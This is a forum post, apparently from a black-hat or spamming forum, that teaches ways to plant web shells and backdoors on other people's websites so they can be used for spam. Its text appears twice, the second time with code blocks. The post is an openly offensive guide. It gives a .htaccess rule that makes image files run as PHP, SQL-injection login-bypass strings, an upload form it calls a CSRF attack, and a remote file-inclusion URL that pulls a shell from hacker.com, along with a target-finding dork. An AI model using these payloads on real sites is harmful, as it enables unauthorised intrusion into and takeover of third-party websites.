Guys, do you have to learn hacking first before spamming?
Father
Professional
- Messages
- 2,602
- Reaction score
- 831
- Points
- 113
Methods for uploading the shell / backdoor to the site for spamming.
In this article, I want to talk about the most commonly used methods of uploading a shell to a site. A web-shell is a kind of malicious script (program) that attackers use to control websites or servers.
Method 1
Find on the website a form for uploading files / images. Let's say we failed to hack the site's admin panel and we are trying to upload our shell with the .php.jpg extension. If we succeed, we will see a white window instead of the picture, we right-click and follow the link. In case of failure, we can use the chrome tamper data extension. It allows you to intercept and modify the request as you wish. If the site checks the file extension, then first we can fill in the .htaccess file with the content:
This command will execute jpg files as php.
Detailed video instruction:
Video instructions for installing tamper data:
Method 2
Use the program to find admin panels on the site - https://github.com/bdblackhat/admin-panel-finder. When the program has found the admin panel, we can try sql-injection. In the login and password field of the site, we drive in the code:
If it works, then we go to the admin panel and act in 1 way. If there is no sql-injection on the site in the admin panel, then we can try to cheat or find an exploit for this CMS.
Method 3
In method 3, we will search for sql-injection on the site itself. We can do it manually or we can use sqlmap. There are enough topics on the forum on how to perform injections, so I'll come from afar. So, here we have already found a table with the administrator's login and password, decrypt the hashes, go to the admin panel and rejoice. But let's say we could not decrypt the password and everything was covered with a copper basin, then we must check the privileges of our user. We check the privileges and load the mini-shell. For some reason, when I want to insert the code, the site gives an error.
Method 4
Method 4 involves a csrf attack. In the code below, we need to replace http: // with our target's link. Select a shell and click the upload button.
Method 5
In the meantime, there is no need to worry about it.
Learn more about your target and find an exploit. There is a very interesting site for this - https://www.exploit-db.com. No one has canceled the massive hacking of sites through vulnerabilities, but there is already an article about this on the form.
There are many more ways to fill the shell and it makes no sense to talk about each one. If you want to practice, install dvwa, a program designed to help security professionals test their skills and tools in a legal environment.
Method 6
Php-injection is a form of attack on a website when an attacker injects his php code into an attacked php application.
Having executed the command, we will load the home page, html. Now we will try to load a malicious shell.
Dork: Inurl : page =
There is also a way to find an already injected shell using a perl script.
Detailed video instruction:
In this article, I want to talk about the most commonly used methods of uploading a shell to a site. A web-shell is a kind of malicious script (program) that attackers use to control websites or servers.
Method 1
Find on the website a form for uploading files / images. Let's say we failed to hack the site's admin panel and we are trying to upload our shell with the .php.jpg extension. If we succeed, we will see a white window instead of the picture, we right-click and follow the link. In case of failure, we can use the chrome tamper data extension. It allows you to intercept and modify the request as you wish. If the site checks the file extension, then first we can fill in the .htaccess file with the content:
Code:
AddType application/x-httpd-php .jpgDetailed video instruction:
Video instructions for installing tamper data:
Method 2
Use the program to find admin panels on the site - https://github.com/bdblackhat/admin-panel-finder. When the program has found the admin panel, we can try sql-injection. In the login and password field of the site, we drive in the code:
Code:
' or '1'='1
' OR 1=1/*Method 3
In method 3, we will search for sql-injection on the site itself. We can do it manually or we can use sqlmap. There are enough topics on the forum on how to perform injections, so I'll come from afar. So, here we have already found a table with the administrator's login and password, decrypt the hashes, go to the admin panel and rejoice. But let's say we could not decrypt the password and everything was covered with a copper basin, then we must check the privileges of our user. We check the privileges and load the mini-shell. For some reason, when I want to insert the code, the site gives an error.
Method 4
Method 4 involves a csrf attack. In the code below, we need to replace http: // with our target's link. Select a shell and click the upload button.
Code:
<form method="POST" action="https://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>Method 5
In the meantime, there is no need to worry about it.
Learn more about your target and find an exploit. There is a very interesting site for this - https://www.exploit-db.com. No one has canceled the massive hacking of sites through vulnerabilities, but there is already an article about this on the form.
There are many more ways to fill the shell and it makes no sense to talk about each one. If you want to practice, install dvwa, a program designed to help security professionals test their skills and tools in a legal environment.
Method 6
Php-injection is a form of attack on a website when an attacker injects his php code into an attacked php application.
Code:
www.site.com?page=home.html
Code:
www.site.com?page=https://hacker.com/webshell.phpThere is also a way to find an already injected shell using a perl script.
Detailed video instruction:
Similar threads
